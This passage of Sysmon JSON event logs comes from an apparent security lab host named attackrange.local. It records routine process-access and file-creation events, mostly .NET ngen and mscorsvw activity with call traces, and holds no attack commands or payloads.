C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.248","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1355-5F25-0000-00109C400E00}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8546,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:20.826\r\nProcessGuid: {E2A3D6B1-137C-5F25-0000-001078840F00}\r\nProcessId: 2716\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a9c-0\\System.ServiceModel.Activation.dll\r\nCreationUtcTime: 2020-08-01 07:02:20.826","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:20.826","ProcessGuid":"{E2A3D6B1-137C-5F25-0000-001078840F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a9c-0\\System.ServiceModel.Activation.dll","CreationUtcTime":"2020-08-01 07:02:20.826","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8547,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.873\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-136A-5F25-0000-0010D49E0E00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.873","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-136A-5F25-0000-0010D49E0E00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8548,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.873\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-136A-5F25-0000-0010D49E0E00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.873","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-136A-5F25-0000-0010D49E0E00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8549,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-136A-5F25-0000-0010D49E0E00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-136A-5F25-0000-0010D49E0E00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8550,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.904\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 5108\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.904","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"5108","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8551,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.951\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-001004300F00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.951","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-001004300F00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8552,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.951\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-001004300F00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.951","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-001004300F00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8553,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.951\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-001004300F00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.951","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-001004300F00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8554,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:21.076\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 